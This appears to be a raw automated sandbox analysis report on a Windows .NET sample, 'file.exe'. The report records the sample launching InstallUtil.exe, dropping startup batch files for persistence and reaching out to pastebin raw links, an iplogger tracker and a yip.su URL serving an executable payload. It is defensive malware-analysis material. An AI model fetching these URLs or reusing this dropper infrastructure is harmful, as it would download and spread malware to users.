                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/xmlMaps
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.datamarket.azure.com/data.ashx/
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://counter.yadro.ru/hit?
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datamarket.accesscontrol.windows.net/v2/OAuth2-13Chttps://api.datamarket.azure.com/#PowerPiv
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datamarket.azure.com/embedded/result
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1djqU4
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://iplogger.org/
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://iplogger.org/privacy/
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://iplogger.org/rules/
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
                    Source: file.exe, 00000001.00000002.3525479820.000000000CE71000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.3525479820.000000000D195000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3186170342.0000000000522000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://yip.su/RNWPd
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drString found in binary or memory: https://yip.su/redirect-
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.8:49721 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FC338 CreateProcessAsUserW,1_2_023FC338
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_021233701_2_02123370
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_021239881_2_02123988
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_021266131_2_02126613
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_021212EF1_2_021212EF
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FB2381_2_023FB238
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F52301_2_023F5230
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F1AF81_2_023F1AF8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FCBC01_2_023FCBC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FC8B81_2_023FC8B8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F74601_2_023F7460
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F6D001_2_023F6D00
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F522B1_2_023F522B
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F92581_2_023F9258
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FD2581_2_023FD258
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F62481_2_023F6248
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F62401_2_023F6240
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F1AE81_2_023F1AE8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F03181_2_023F0318
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F03081_2_023F0308
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FABF81_2_023FABF8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F10F81_2_023F10F8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F10E91_2_023F10E9
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F79761_2_023F7976
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F19501_2_023F1950
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F19411_2_023F1941
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F01401_2_023F0140
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F26A81_2_023F26A8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F16D81_2_023F16D8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F16C81_2_023F16C8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F74501_2_023F7450
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F14A01_2_023F14A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F14911_2_023F1491
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023FA4901_2_023FA490
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F6CF01_2_023F6CF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F25F91_2_023F25F9
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F0DF81_2_023F0DF8
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F0DE91_2_023F0DE9
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02404B701_2_02404B70
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02402B201_2_02402B20
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240CFF01_2_0240CFF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240E0881_2_0240E088
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_024094981_2_02409498
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240EC981_2_0240EC98
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240F5201_2_0240F520
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02404B0E1_2_02404B0E
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02402B111_2_02402B11
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240CFE01_2_0240CFE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240EBE01_2_0240EBE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240EC5E1_2_0240EC5E
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240E0771_2_0240E077
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240EC7B1_2_0240EC7B
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240EC241_2_0240EC24
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240F5101_2_0240F510
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02480E001_2_02480E00
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_024819081_2_02481908
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E72DA01_2_05E72DA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7F6B01_2_05E7F6B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7E8101_2_05E7E810
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7F6771_2_05E7F677
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7E60C1_2_05E7E60C
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E72D981_2_05E72D98
                    Source: file.exe, 00000001.00000002.3525479820.000000000D22B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                    Source: file.exe, 00000001.00000002.3516306034.0000000004E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs file.exe
                    Source: file.exe, 00000001.00000002.3515300158.00000000023D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs file.exe
                    Source: file.exe, 00000001.00000000.1599975187.0000000001B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBubly2.exeL vs file.exe
                    Source: file.exe, 00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs file.exe
                    Source: file.exe, 00000001.00000002.3514694487.000000000219E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                    Source: file.exe, 00000001.00000002.3525479820.000000000CE71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                    Source: file.exe, 00000001.00000002.3546455241.000000000FE55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepicturefonts.exe0 vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameBubly2.exeL vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exe, Gj53F.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@19/8@4/4
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat" "
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 18%
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JnikXG7VSGx0qVwm8oVPQ6yD.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\19S9Dp4fmqvJxlR4ciWynHCd.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
